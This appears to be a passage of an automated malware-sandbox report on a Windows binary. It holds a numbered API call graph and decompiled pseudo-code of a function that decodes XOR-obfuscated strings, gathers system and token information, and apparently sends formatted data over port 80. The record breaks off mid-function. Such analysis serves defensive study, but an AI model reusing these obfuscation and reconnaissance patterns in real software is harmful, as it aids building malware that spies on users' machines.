426384 23574 4266e5 23562->23574 23564 426397 23565 426389 ctype 23565->23564 23566 4241fb __lock 34 API calls 23565->23566 23569 428d87 23566->23569 23567 428def 23577 428e01 23567->23577 23569->23567 23571 422ade 47 API calls 23569->23571 23572 428dc4 RtlDeleteCriticalSection 23569->23572 23570 428df8 ctype 23571->23569 23573 42275e ___free_lc_time 34 API calls 23572->23573 23573->23569 23580 426610 23574->23580 23576 4266ec 23576->23565 23597 424146 RtlLeaveCriticalSection 23577->23597 23579 428e08 23579->23570 23581 42661c ctype 23580->23581 23582 4241fb __lock 34 API calls 23581->23582 23589 42662b 23582->23589 23583 4266c1 23593 4266dc 23583->23593 23585 4263c7 35 API calls 23585->23589 23586 4266ca ctype 23586->23576 23588 4265e2 44 API calls 23588->23589 23589->23583 23589->23585 23589->23588 23590 4266b0 23589->23590 23591 426419 2 API calls 23590->23591 23592 4266be 23591->23592 23592->23589 23596 424146 RtlLeaveCriticalSection 23593->23596 23595 4266e3 23595->23586 23596->23595 23597->23579 17528 423f8a SetUnhandledExceptionFilter 17773 42fe90 17778 41e900 17773->17778 17779 41e974 17778->17779 17797 4215c0 17779->17797 17781 41ebe9 17782 41a7a0 2 API calls 17781->17782 17783 41ec07 17782->17783 17784 41a7a0 2 API calls 17783->17784 17785 41ec21 17784->17785 17786 41a7a0 2 API calls 17785->17786 17787 41ec3b 17786->17787 17788 41a7a0 2 API calls 17787->17788 17789 41ec55 17788->17789 17790 41a7a0 2 API calls 17789->17790 17791 41ec6f 17790->17791 17891 421b00 17791->17891 17794 4228af 17946 422877 17794->17946 17894 41ac50 17797->17894 17801 421623 17802 42162e 17801->17802 17803 41acd0 3 API calls 17801->17803 17802->17781 17804 421647 17803->17804 17805 421651 17804->17805 17806 421665 17804->17806 17906 41ad50 17805->17906 17808 41acd0 3 API calls 17806->17808 17810 421672 17808->17810 17809 421659 17809->17781 17811 421696 17810->17811 17812 42167a 17810->17812 17813 41acd0 3 API calls 17811->17813 17814 41ad50 3 API calls 17812->17814 17815 4216a3 17813->17815 17816 421682 17814->17816 17817 4216d5 17815->17817 17818 4216a9 17815->17818 17819 41ad50 3 API calls 17816->17819 17821 41acd0 3 API calls 17817->17821 17820 41ad50 3 API calls 17818->17820 17822 42168a 17819->17822 17823 4216b5 17820->17823 17824 4216df 17821->17824 17822->17781 17825 41ad50 3 API calls 17823->17825 17826 4216e5 17824->17826 17827 421719 17824->17827 17828 4216bd 17825->17828 17830 41ad50 3 API calls 17826->17830 17829 41acd0 3 API calls 17827->17829 17831 41ad50 3 API calls 17828->17831 17832 421726 17829->17832 17833 4216f1 17830->17833 17835 4216c9 17831->17835 17836 42176c 17832->17836 17837 42172c 17832->17837 17834 41ad50 3 API calls 17833->17834 17838 4216f9 17834->17838 17835->17781 17912 41cc50 17836->17912 17840 41ad50 3 API calls 17837->17840 17841 41ad50 3 API calls 17838->17841 17843 421738 17840->17843 17844 421705 17841->17844 17845 41ad50 3 API calls 17843->17845 17846 41ad50 3 API calls 17844->17846 17848 421744 17845->17848 17890 42170d 17846->17890 17847 41afe0 2 API calls 17849 4217a2 17847->17849 17850 41ad50 3 API calls 17848->17850 17851 41c9f0 4 API calls 17849->17851 17852 421750 17850->17852 17854 4217a8 17851->17854 17853 41ad50 3 API calls 17852->17853 17855 421758 17853->17855 17854->17890 17916 41cd20 17854->17916 17856 41ad50 3 API calls 17855->17856 17858 421760 17856->17858 17858->17781 17859 4217cb 17860 41cd20 5 API calls 17859->17860 17859->17890 17861 4217ee 17860->17861 17862 41cd20 5 API calls 17861->17862 17861->17890 17863 42180d 17862->17863 17863->17890 17922 41cdd0 17863->17922 17868 421880 AllocateAndInitializeSid 17868->17890 17869 421851 17869->17781 17890->17781 17942 41b250 17891->17942 17895 41acc2 17894->17895 17896 41ac5c 17894->17896 17900 41acd0 17895->17900 17898 41a600 2 API calls 17896->17898 17899 41acba 17898->17899 17899->17895 17901 41ad2b RtlAllocateHeap 17900->17901 17902 41acdc 17900->17902 17901->17801 17904 41a600 2 API calls 17902->17904 17905 41ad23 17904->17905 17905->17901 17907 41adab KiUserExceptionDispatcher 17906->17907 17908 41ad5c 17906->17908 17907->17809 17910 41a600 2 API calls 17908->17910 17911 41ada3 17910->17911 17911->17907 17913 41cc63 17912->17913 17914 41cd02 17912->17914 17913->17913 17915 41c580 4 API calls 17913->17915 17914->17847 17914->17890 17915->17914 17917 41cdab GetTokenInformation 17916->17917 17918 41cd2c 17916->17918 17917->17859 17920 41c580 4 API calls 17918->17920 17921 41cda3 17920->17921 17921->17917 17923 41cde0 17922->17923 17924 41ce76 17922->17924 17925 41c580 4 API calls 17923->17925 17924->17890 17926 41cea0 17924->17926 17925->17924 17927 41ceb0 17926->17927 17928 41cf47 17926->17928 17929 41c580 4 API calls 17927->17929 17928->17868 17928->17869 17929->17928 17943 41b25c 17942->17943 17944 41b2b6 17942->17944 17945 41a600 2 API calls 17943->17945 17944->17794 17945->17944 17947 422883 ctype 17946->17947 17954 4253c6 17947->17954 17953 4228a0 ctype 17955 4241fb __lock 34 API calls 17954->17955 17956 422888 17955->17956 17957 4227cf 17956->17957 17967 42555d 17957->17967 17959 4227db 17962 42281d 17959->17962 17975 4251e9 17959->17975 17961 422808 17961->17962 17964 4228a9 17962->17964 18001 4253cf 17964->18001 17968 425569 ctype 17967->17968 17969 4255ac RtlSizeHeap 17968->17969 17971 4241fb __lock 34 API calls 17968->17971 17970 4255bf ctype 17969->17970 17970->17959 17972 425579 ___free_lc_time 17971->17972 17993 4255ca 17972->17993 17976 4251f5 ctype 17975->17976 17977 4251fe 17976->17977 17978 42520c 17976->17978 17979 422eeb __getbuf 34 API calls 17977->17979 17980 425213 17978->17980 17981 42521f 17978->17981 17983 425206 ctype 17979->17983 17982 42275e ___free_lc_time 34 API calls 17980->17982 17986 42535a __getbuf 17981->17986 17992 42522c __getbuf ___sbh_resize_block ___free_lc_time 17981->17992 17982->17983 17983->17961 17984 425368 RtlReAllocateHeap 17984->17986 17985 4241fb __lock 34 API calls 17985->17992 17986->17983 17986->17984 17988 4252b8 RtlAllocateHeap 17988->17992 17989 42530e RtlReAllocateHeap 17989->17992 17990 424eed __getbuf 5 API calls 17990->17992 17991 424739 VirtualFree VirtualFree HeapFree ___free_lc_time 17991->17992 17992->17983 17992->17985 17992->17988 17992->17989 17992->17990 17992->17991 17997 425351 17992->17997 17996 424146 RtlLeaveCriticalSection 17993->17996 17995 4255a6 17995->17969 17995->17970 17996->17995 18004 424146 RtlLeaveCriticalSection 18001->18004 18003 4228ae 18003->17953 18004->18003 18380 41d0a0 18381 41d113 OpenSCManagerA 18380->18381 18382 41d0ac 18380->18382 18384 41c580 4 API calls 18382->18384 18385 41d10b 18384->18385 18385->18381 18386 42bea0 18387 42bebe ___initmbctable 18386->18387 18397 42beb2 18386->18397 18387->18397 18398 42b7fa 18387->18398 18390 4251e9 37 API calls 18391 42bf11 ___initmbctable _strlen 18390->18391 18392 422eeb __getbuf 34 API calls 18391->18392 18393 42bf5a 18392->18393 18401 42b7bd 18393->18401 18395 42bf63 _strcat 18395->18397 18404 42c11a 18395->18404 18412 42b7ca 18398->18412 18602 42f885 18401->18602 18403 42b7c8 18403->18395 18405 42c12a 18404->18405 18406 422eeb __getbuf 34 API calls 18405->18406 18407 42c132 18406->18407 18613 42b7a4 18407->18613 18415 42f955 18412->18415 18414 42b7dd 18414->18390 18414->18391 18416 42f961 ctype 18415->18416 18423 426398 18416->18423 18418 42f969 18429 42f8c6 18418->18429 18422 42f98b ctype 18422->18414 18424 4263a5 18423->18424 18425 4263bc RtlEnterCriticalSection 18423->18425 18424->18425 18426 4263ac 18424->18426 18425->18418 18427 4241fb __lock 34 API calls 18426->18427 18428 4263ba 18427->18428 18428->18418 18430 42f944 18429->18430 18435 42f8d3 18429->18435 18431 426856 __lock 34 API calls 18430->18431 18434 42f934 18431->18434 18432 42f8e5 18433 42f8f6 18432->18433 18443 42f723 18432->18443 18454 426585 18433->18454 18440 42f994 18434->18440 18435->18430 18435->18432 18595 4263ea 18440->18595 18442 42f99c 18442->18422 18444 42f73c 18443->18444 18445 428544 _write_multi_char 38 API calls 18444->18445 18446 42f748 18445->18446 18447 42f7b5 18446->18447 18449 42f75c 18446->18449 18450 42f775 18446->18450 18448 426856 __lock 34 API calls 18447->18448 18448->18449 18449->18433 18450->18449 18451 428544 _write_multi_char 38 API calls 18450->18451 18452 42f814 18451->18452 18452->18449 18453 428544 _write_multi_char 38 API calls 18452->18453 18453->18449 18455 4265b6 18454->18455 18456 42659a 18454->18456 18458 428544 18455->18458 18456->18455 18476 4287bd 18456->18476 18459 428550 ctype 18458->18459 18460 4285d3 18459->18460 18462 42857b 18459->18462 18461 426856 __lock 34 API calls 18460->18461 18463 4285d8 18461->18463 18464 428b31 _write_multi_char 35 API calls 18462->18464 18465 42685f _write_multi_char 34 API calls 18463->18465 18466 428581 18464->18466 18473 4285c3 ctype 18465->18473 18467 4285a3 18466->18467 18468 42858f 18466->18468 18469 426856 __lock 34 API calls 18467->18469 18580 4284d0 18468->18580 18472 4285a8 18469->18472 18471 42859b 18591 4285cb 18471->18591 18474 42685f _write_multi_char 34 API calls 18472->18474 18473->18434 18474->18471 18477 4287c9 ctype 18476->18477 18478 42884c 18477->18478 18480 4287f4 18477->18480 18479 426856 __lock 34 API calls 18478->18479 18481 428851 18479->18481 18494 428b31 18480->18494 18483 42685f _write_multi_char 34 API calls 18481->18483 18493 42883c ctype 18483->18493 18484 4287fa 18485 428808 18484->18485 18486 42881c 18484->18486 18506 4285ef 18485->18506 18488 426856 __lock 34 API calls 18486->18488 18490 428821 18488->18490 18489 428814 18538 428844 18489->18538 18535 42685f 18490->18535 18493->18455 18495 428b3d ctype 18494->18495 18496 428b9f RtlEnterCriticalSection 18495->18496 18497 4241fb __lock 34 API calls 18495->18497 18498 428bbf ctype 18496->18498 18499 428b65 18497->18499 18498->18484 18500 428b96 18499->18500 18501 428b6e 18499->18501 18541 428bc8 18500->18541 18502 427a37 __lock GetProcAddress 18501->18502 18504 428b7c 18502->18504 18504->18500 18505 428b82 __lock 18504->18505 18505->18498 18507 428620 18506->18507 18520 428619 18506->18520 18508 42864a 18507->18508 18509 42865c 18507->18509 18545 429d9c 18508->18545 18512 428737 WriteFile 18509->18512 18513 42866a 18509->18513 18510 428381 _fast_error_exit 34 API calls 18514 4287b5 18510->18514 18517 42870b 18512->18517 18518 42875f GetLastError 18512->18518 18516 428775 18513->18516 18522 4286c0 WriteFile 18513->18522 18514->18489 18519 42878d 18516->18519 18516->18520 18517->18516 18517->18520 18524 42871b 18517->18524 18518->18517 18521 426856 __lock 34 API calls 18519->18521 18520->18510 18525 428792 18521->18525 18523 428700 GetLastError 18522->18523 18526 4286e1 18522->18526 18527 4286fe 18523->18527 18528 428723 18524->18528 18529 42876a 18524->18529 18530 42685f _write_multi_char 34 API calls 18525->18530 18526->18513 18526->18527 18527->18517 18532 426856 __lock 34 API calls 18528->18532 18555 426868 18529->18555 18530->18520 18533 428728 18532->18533 18534 42685f _write_multi_char 34 API calls 18533->18534 18534->18520 18536 423bdf __lock 34 API calls 18535->18536 18537 426864 18536->18537 18537->18489 18579 428bd1 RtlLeaveCriticalSection 18538->18579 18540 42884a 18540->18493 18544 424146 RtlLeaveCriticalSection 18541->18544 18543 428bcf 18543->18496 18544->18543 18572 428af0 18545->18572 18547 429db8 18548 429dc0 18547->18548 18549 429dcd SetFilePointer 18547->18549 18551 426856 __lock 34 API calls 18548->18551 18550 429de5 GetLastError 18549->18550 18553 428659 18549->18553 18552 429def 18550->18552 18550->18553 18551->18553 18554 426868 _write_multi_char 34 API calls 18552->18554 18553->18509 18554->18553 18556 423bdf __lock 34 API calls 18555->18556 18557 42686e 18556->18557 18558 42689e 18557->18558 18559 426886 18557->18559 18560 423bdf __lock 34 API calls 18558->18560 18561 4268af 18559->18561 18564 426890 18559->18564 18562 4268a3 18560->18562 18563 4268cd 18561->18563 18565 4268bf 18561->18565 18562->18520 18566 423bdf __lock 34 API calls 18563->18566 18567 423bdf __lock 34 API calls 18564->18567 18568 423bdf __lock 34 API calls 18565->18568 18569 4268d2 18566->18569 18570 426895 18567->18570 18571 4268c4 18568->18571 18569->18520 18570->18520 18571->18520 18573 428afc 18572->18573 18574 428b17 18573->18574 18575 426856 __lock 34 API calls 18573->18575 18574->18547 18576 428b1f 18575->18576 18577 42685f _write_multi_char 34 API calls 18576->18577 18578 428b2a 18577->18578 18578->18547 18579->18540 18581 428af0 _write_multi_char 34 API calls 18580->18581 18582 4284db 18581->18582 18583 4284f1 SetFilePointer 18582->18583 18584 4284e1 18582->18584 18586 42850a GetLastError 18583->18586 18588 428512 18583->18588 18585 426856 __lock 34 API calls 18584->18585 18587 4284e6 18585->18587 18586->18588 18587->18471 18589 42851e 18588->18589 18590 426868 _write_multi_char 34 API calls 18588->18590 18589->18471 18590->18589 18594 428bd1 RtlLeaveCriticalSection 18591->18594 18593 4285d1 18593->18473 18594->18593 18596 4263f7 18595->18596 18597 42640e RtlLeaveCriticalSection 18595->18597 18596->18597 18598 4263fe 18596->18598 18597->18442 18601 424146 RtlLeaveCriticalSection 18598->18601 18600 42640c 18600->18442 18601->18600 18603 42f891 ctype 18602->18603 18604 426398 35 API calls 18603->18604 18605 42f899 18604->18605 18606 42f723 38 API calls 18605->18606 18607 42f8a6 18606->18607 18610 42f8bc 18607->18610 18609 42f8b3 ctype 18609->18403 18611 4263ea 2 API calls 18610->18611 18612 42f8c4 18611->18612 18612->18609 18616 42f6d7 18613->18616 19142 41b5b0 19143 41b622 Process32First 19142->19143 19144 41b5bc 19142->19144 19146 41a600 2 API calls 19144->19146 19147 41b61a 19146->19147 19147->19143

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 13 414310-4143be call 422920 16 4143c0-4143c3 13->16 17 4143c5-4143c8 16->17 18 4143ca 16->18 19 4143cd-4143d6 17->19 18->19 19->16 20 4143d8-41443b 19->20 21 414440-414443 20->21 22 414445-414448 21->22 23 41444a 21->23 24 41444d-414456 22->24 23->24 24->21 25 414458-41445e 24->25 26 414460-414464 25->26 27 414466-414468 25->27 28 41446a-414499 26->28 27->28 29 4144a0-4144a3 28->29 29->29 30 4144a5-4144b2 call 41e5f0 29->30 33 4144b4-4144ba 30->33 34 4144bc 30->34 35 4144bf-4144cb 33->35 34->35 36 414991-414999 35->36 37 4144d1 35->37 38 4149b1-4149c4 36->38 39 41499b-4149ae 36->39 40 4145b6-414603 call 4142c0 wsprintfA 37->40 41 4144d8-4145b1 call 4142c0 wsprintfA 37->41 42 414608-414678 call 4142c0 wsprintfA 37->42 43 4146fb-414785 call 4142c0 wsprintfA 37->43 44 41468c-4146f6 call 4142c0 wsprintfA 37->44 55 41478b-414791 40->55 41->55 56 414683-414687 42->56 57 41467a-41467e 42->57 58 414787 43->58 44->55 59 414793-414797 55->59 60 414799-41479b 55->60 56->58 57->58 58->55 61 41479d-4147b4 call 421f9d call 42a2d2 59->61 60->61 65 4147b9-4147d8 61->65 66 4147da-4147dd 65->66 67 4147df 65->67 68 4147e2-4147eb 66->68 67->68 69 4147f2-4147f5 68->69 70 4147ed-4147f0 68->70 71 4147f9-41487f 69->71 70->71 72 414881-414884 71->72 73 414886-414889 72->73 74 41488b 72->74 75 41488e-414897 73->75 74->75 75->72 76 414899-41491e call 4228c1 lstrlen call 401390 call 41ac50 call 41acd0 75->76 85 414920-414945 lstrlen call 401400 76->85 86 414986-41498e 76->86 89 414947-41494f 85->89 90 414978-414981 call 41ac50 call 41ad50 85->90 92 414951-414954 89->92 93 414956 89->93 90->86 94 414959-414975 call 406c30 92->94 93->94 94->90
                                                                    C-Code - Quality: 82%
                                                                    			E00414310(void* __ecx, void* __eflags, char _a1, signed int _a2, char _a3, signed int* _a4, char _a5, signed char _a6, char _a7, signed int _a8, char _a9, char _a10, char _a11, char _a12, char _a13, char _a14, char _a15, char _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a32, char _a33, char _a34, char _a35, char _a36, char _a37, char _a38, char _a39, char _a40, char _a41, char _a42, char _a43, char _a44, char _a45, char _a46, char _a47, char _a56, char _a57, char _a58, char _a59, char _a60, char _a61, char _a62, char _a63, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, char _a70, char _a71, char _a72, char _a73, char _a74, char _a75, char _a76, char _a77, char _a78, char _a79, char _a80, char _a81, char _a82, char _a83, char _a84, char _a85, char _a86, char _a87, char _a88, char _a89, char _a90, char _a91, char _a92, char _a93, char _a96, char _a97, char _a98, char _a99, char _a100, char _a101, char _a102, char _a103, char _a104, char _a105, char _a106, char _a107, char _a108, char _a109, char _a110, char _a111, char _a112, char _a113, char _a114, char _a115, char _a116, char _a117, char _a128, char _a244, char _a256, void* _a1260, void* _a1264, void _a1280, void _a3320, char _a3328) {
                                                                    				signed int _v0;
                                                                    				char _v1;
                                                                    				signed char _v2;
                                                                    				signed int _t252;
                                                                    				void* _t257;
                                                                    				signed int _t258;
                                                                    				signed int _t259;
                                                                    				signed short _t262;
                                                                    				void* _t263;
                                                                    				signed int _t265;
                                                                    				signed int _t266;
                                                                    				signed int* _t316;
                                                                    				signed int _t323;
                                                                    				signed int _t326;
                                                                    				signed int _t330;
                                                                    				int _t364;
                                                                    				void* _t367;
                                                                    				char _t394;
                                                                    				signed int _t395;
                                                                    				signed int _t396;
                                                                    				signed int _t402;
                                                                    				signed int _t403;
                                                                    				void* _t404;
                                                                    
                                                                    				_t403 = _t402 & 0xfffffff8;
                                                                    				E00422920(0x10fc, __ecx);
                                                                    				_a68 = 0xa7;
                                                                    				_a69 = 0xa7;
                                                                    				_a70 = 0xa7;
                                                                    				_a73 = 0xb5;
                                                                    				_a80 = 0xb5;
                                                                    				_a77 = 0xbe;
                                                                    				_a88 = 0xbe;
                                                                    				_a87 = 0xbf;
                                                                    				_a91 = 0xbf;
                                                                    				_t252 =  *0x447cfc; // 0x0
                                                                    				_a78 = 0xbd;
                                                                    				_a92 = 0xbd;
                                                                    				_t323 = _a20 + (_t252 - _a20 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    				_a71 = 0xe3;
                                                                    				_a72 = 0xfe;
                                                                    				_a74 = 0xa2;
                                                                    				_a75 = 0xa4;
                                                                    				_a76 = 0xb9;
                                                                    				_a79 = 0xb4;
                                                                    				_a81 = 0xa3;
                                                                    				_a82 = 0xb1;
                                                                    				_a83 = 0xb3;
                                                                    				_a84 = 0xb8;
                                                                    				_a85 = 0xbc;
                                                                    				_a86 = 0xb9;
                                                                    				_a89 = 0xfe;
                                                                    				_a90 = 0xb3;
                                                                    				_a93 = 0xd0;
                                                                    				_t364 = 0;
                                                                    				goto L1;
                                                                    				do {
                                                                    					L6:
                                                                    					if(_t326 >= 0x2d) {
                                                                    						_t326 = _t326 * 0x2e;
                                                                    					} else {
                                                                    						_t326 = _t326 ^ 0x00000022;
                                                                    					}
                                                                    					 *(_t403 + _t257 + 0x30) =  *(_t403 + _t257 + 0x30) ^ 0x0000007f;
                                                                    					_t257 = _t257 + 1;
                                                                    				} while (_t257 < 0x10);
                                                                    				_t258 = _v2;
                                                                    				if(_t258 >= 0x6f) {
                                                                    					_t259 = _t258 * 0x18;
                                                                    				} else {
                                                                    					_t259 = _t258 * 0x17;
                                                                    				}
                                                                    				_v2 = _t259;
                                                                    				memset( &_a3320, 0, 0x100 << 2);
                                                                    				_t404 = _t403 + 0xc;
                                                                    				_t262 = _v2 & 0x000000ff;
                                                                    				_t330 = _t262 & 0x2f;
                                                                    				_t367 = 0x69;
                                                                    				_t394 = 0x47;
                                                                    				_t263 = _t262 + 0xb162;
                                                                    				do {
                                                                    					_t367 = _t367 - _t330;
                                                                    					_t394 = _t394 - 1;
                                                                    				} while (_t394 != 0);
                                                                    				_t395 = _t263 + _t367 - 0xc;
                                                                    				E0041E5F0();
                                                                    				if(_t395 >= 0x5a) {
                                                                    					_t396 = _t395 * 0x6d;
                                                                    				} else {
                                                                    					_t396 = _t395 + 0xffad;
                                                                    				}
                                                                    				_t316 = _a4;
                                                                    				_t265 =  *_t316;
                                                                    				_v0 = _t396;
                                                                    				if(_t265 > 4) {
                                                                    					_t266 =  *0x447cfc; // 0x0
                                                                    					if(_t266 >= 0x2c) {
                                                                    						 *0x447cfc = _t266 + 0x42;
                                                                    						return 1;
                                                                    					} else {
                                                                    						 *0x447cfc = _t266 * 0x4f;
                                                                    						return 1;
                                                                    					}
                                                                    				} else {
                                                                    					switch( *((intOrPtr*)(_t265 * 4 +  &M004149C8))) {
                                                                    						case 0:
                                                                    							_a98 = 0xad;
                                                                    							_a103 = 0xad;
                                                                    							_a105 = 0xf8;
                                                                    							_a110 = 0xf8;
                                                                    							_a115 = 0xf8;
                                                                    							_v1 = 0xdd;
                                                                    							_a96 = 0xa9;
                                                                    							_a97 = 0xa4;
                                                                    							_a99 = 0xb8;
                                                                    							_a100 = 0xe0;
                                                                    							_a101 = 0xae;
                                                                    							_a102 = 0xfb;
                                                                    							_a104 = 0xe0;
                                                                    							_a106 = 0xb9;
                                                                    							_a107 = 0xfb;
                                                                    							_a108 = 0xaf;
                                                                    							_a109 = 0xe0;
                                                                    							_a111 = 0xb9;
                                                                    							_a112 = 0xfb;
                                                                    							_a113 = 0xb0;
                                                                    							_a114 = 0xe0;
                                                                    							_a116 = 0xb9;
                                                                    							_a117 = 0xdd;
                                                                    							wsprintfA( &_a244, E004142C0(0x16,  &_a96,  &_v1), _t316[1], _t316[2], _t316[3]);
                                                                    							_t405 = _t404 + 0x14;
                                                                    							_a2 = _a2 + ((_a2 & 0x000000ff) - _a4 + 0x00000042 ^ 0x0000004d) * 0x32;
                                                                    							goto L28;
                                                                    						case 1:
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 7;
                                                                    							_v1 = 0x22;
                                                                    							_v0 = 0x56;
                                                                    							_a1 = 0x5b;
                                                                    							_a2 = 0x52;
                                                                    							_a3 = 0x47;
                                                                    							_a4 = 0x1f;
                                                                    							_a5 = 0x44;
                                                                    							_a6 = 0x22;
                                                                    							__eax = E004142C0(7,  &_v0,  &_v1);
                                                                    							__ecx =  &_a244;
                                                                    							__eax = wsprintfA( &_a244, __eax);
                                                                    							__esp = __esp + 8;
                                                                    							goto L28;
                                                                    						case 2:
                                                                    							__al = 0x7b;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0xc;
                                                                    							_v1 = 0x46;
                                                                    							_v0 = 0x32;
                                                                    							_a1 = 0x3f;
                                                                    							_a2 = 0x36;
                                                                    							_a3 = 0x23;
                                                                    							_a4 = 0x7b;
                                                                    							_a5 = 0x27;
                                                                    							_a6 = 0x60;
                                                                    							_a7 = 0x28;
                                                                    							_a8 = 0x7b;
                                                                    							_a9 = 0x63;
                                                                    							_a10 = 0x22;
                                                                    							_a11 = 0x46;
                                                                    							__eax = E004142C0(0xc,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 4));
                                                                    							__eax = wsprintfA( &_a244, __eax,  *((intOrPtr*)(__ebx + 4)));
                                                                    							__al = _a2;
                                                                    							__esp = __esp + 0xc;
                                                                    							if(__al >= 0x6f) {
                                                                    								__eax = __eax * 0x18;
                                                                    							} else {
                                                                    								__eax = __eax * 0x17;
                                                                    							}
                                                                    							goto L27;
                                                                    						case 3:
                                                                    							__al = 0x6c;
                                                                    							_a4 = 0x6c;
                                                                    							_a8 = 0x6c;
                                                                    							_a13 = 0x6c;
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0x11;
                                                                    							_v1 = 0x51;
                                                                    							_v0 = 0x25;
                                                                    							_a1 = 0x28;
                                                                    							_a2 = 0x21;
                                                                    							_a3 = 0x34;
                                                                    							_a5 = 0x3c;
                                                                    							_a6 = 0x77;
                                                                    							_a7 = 0x22;
                                                                    							_a9 = 0x74;
                                                                    							_a10 = 0x35;
                                                                    							_a11 = 0x77;
                                                                    							_a12 = 0x37;
                                                                    							_a14 = 0x74;
                                                                    							_a15 = 0x35;
                                                                    							_a16 = 0x51;
                                                                    							__eax = E004142C0(0x11,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 8));
                                                                    							 &_a244 = wsprintfA( &_a244,  &_a244,  *((intOrPtr*)(__ebx + 4)),  *((intOrPtr*)(__ebx + 8)));
                                                                    							__al = _a2;
                                                                    							__esp = __esp + 0x10;
                                                                    							__al = _a2 ^ 0x00000048;
                                                                    							L27:
                                                                    							_a6 = __al;
                                                                    							goto L28;
                                                                    						case 4:
                                                                    							__al = 0xd7;
                                                                    							_a5 = 0xd7;
                                                                    							_a10 = 0xd7;
                                                                    							__eax =  &_v1;
                                                                    							__esi =  &_v0;
                                                                    							__edi = 0xc;
                                                                    							_v1 = 0xb3;
                                                                    							_v0 = 0xc7;
                                                                    							_a1 = 0xca;
                                                                    							_a2 = 0xc3;
                                                                    							_a3 = 0xd6;
                                                                    							_a4 = 0x8e;
                                                                    							_a6 = 0x95;
                                                                    							_a7 = 0xdd;
                                                                    							_a8 = 0x8e;
                                                                    							_a9 = 0x96;
                                                                    							_a11 = 0xb3;
                                                                    							__eax = E004142C0(0xc,  &_v0,  &_v1);
                                                                    							__ecx =  *((intOrPtr*)(__ebx + 4));
                                                                    							__eax = wsprintfA( &_a244, __eax,  *((intOrPtr*)(__ebx + 4)));
                                                                    							__esp = __esp + 0xc;
                                                                    							L28:
                                                                    							_t281 = _a6;
                                                                    							if(_t281 >= 0x6f) {
                                                                    								_t282 = _t281 * 0x18;
                                                                    							} else {
                                                                    								_t282 = _t281 * 0x17;
                                                                    							}
                                                                    							_push(_t316);
                                                                    							_a6 = _t282;
                                                                    							L00421F9D();
                                                                    							E0042A2D2(0x16,  &_a128, 0x80);
                                                                    							_t375 =  *0x447cfc; // 0x0
                                                                    							_t287 = _a8 + (_t375 - _a8 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    							_t406 = _t405 + 0xc;
                                                                    							if(_t287 >= 0x2d) {
                                                                    								_t288 = _t287 * 0x2e;
                                                                    							} else {
                                                                    								_t288 = _t287 ^ 0x00000022;
                                                                    							}
                                                                    							_a32 = 0x33;
                                                                    							if(_t288 >= 0x2d) {
                                                                    								_a8 = _t288 * 0x2e;
                                                                    							}
                                                                    							_a35 = 0x33;
                                                                    							_a60 = 0xac;
                                                                    							_a67 = 0xac;
                                                                    							_a70 = 0xac;
                                                                    							_a73 = 0xac;
                                                                    							_a61 = 0xfa;
                                                                    							_a68 = 0xfa;
                                                                    							_a71 = 0xfa;
                                                                    							_a74 = 0xfa;
                                                                    							_t292 = _a28 + (_t375 - _a28 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    							_a33 = 0x2e;
                                                                    							_a34 = 0x30;
                                                                    							_a36 = 0;
                                                                    							_a56 = 0xdf;
                                                                    							_a57 = 0xec;
                                                                    							_a58 = 0xfb;
                                                                    							_a59 = 0xb4;
                                                                    							_a62 = 0xaf;
                                                                    							_a63 = 0xe5;
                                                                    							_a64 = 0xe0;
                                                                    							_a65 = 0xed;
                                                                    							_a66 = 0xb4;
                                                                    							_a69 = 0xaf;
                                                                    							_a72 = 0xaf;
                                                                    							_a75 = 0x89;
                                                                    							_t348 = 0;
                                                                    							do {
                                                                    								if(_t292 >= 0x2d) {
                                                                    									_t292 = _t292 * 0x2e;
                                                                    								} else {
                                                                    									_t292 = _t292 ^ 0x00000022;
                                                                    								}
                                                                    								 *(_t406 + _t348 + 0x40) =  *(_t406 + _t348 + 0x40) ^ 0x00000089;
                                                                    								_t348 = _t348 + 1;
                                                                    							} while (_t348 < 0x14);
                                                                    							memset( &_a1280, 0, 0x200 << 2);
                                                                    							 *0x447cfc = _t375 & _a6 & 0x000000ff;
                                                                    							_push( &_a3328);
                                                                    							_push( &_a256);
                                                                    							_push( &_a128);
                                                                    							E004228C1( &_a1280, 0x7ff,  &_a56,  &_a32);
                                                                    							_t391 =  *0x43003c;
                                                                    							_push(0);
                                                                    							_t300 = E00401390( *_t391(),  &_a1280);
                                                                    							_t409 = _t406 + 0x30;
                                                                    							_a24 = _t300;
                                                                    							_t400 = E0041ACD0(E0041AC50(), 0, _t300);
                                                                    							if(_t400 != 0) {
                                                                    								_push(0);
                                                                    								_push( &_a24);
                                                                    								_push(_t400);
                                                                    								_push(_t409 + 0x514);
                                                                    								_push( *_t391());
                                                                    								_push(_t409 + 0x518);
                                                                    								if(E00401400() != 0) {
                                                                    									_t309 =  *0x447cfc; // 0x0
                                                                    									if(_t309 >= 0x2c) {
                                                                    										_t310 = _t309 + 0x42;
                                                                    									} else {
                                                                    										_t310 = _t309 * 0x4f;
                                                                    									}
                                                                    									_push(_a20);
                                                                    									_push(_t400);
                                                                    									 *0x447cfc = _t310;
                                                                    									E00406C30( &_a68,  &_a32, 0x50);
                                                                    								}
                                                                    								E0041AD50(E0041AC50(), 0, _t400);
                                                                    							}
                                                                    							return 0;
                                                                    							goto L53;
                                                                    					}
                                                                    				}
                                                                    				L53:
                                                                    				L1:
                                                                    				if(_t323 >= 0x2d) {
                                                                    					_t323 = _t323 * 0x2e;
                                                                    				} else {
                                                                    					_t323 = _t323 ^ 0x00000022;
                                                                    				}
                                                                    				 *(_t403 + _t364 + 0x54) =  *(_t403 + _t364 + 0x54) ^ 0x000000d0;
                                                                    				_t364 = _t364 + 1;
                                                                    				if(_t364 < 0x1a) {
                                                                    					goto L1;
                                                                    				} else {
                                                                    					_a33 = 0x1c;
                                                                    					_a44 = 0x1c;
                                                                    					_t326 = _a20 + (_t252 - _a20 ^ 0x00000020 | 0x00000044) * 0x75;
                                                                    					_a32 = 0x50;
                                                                    					_a34 = 0x18;
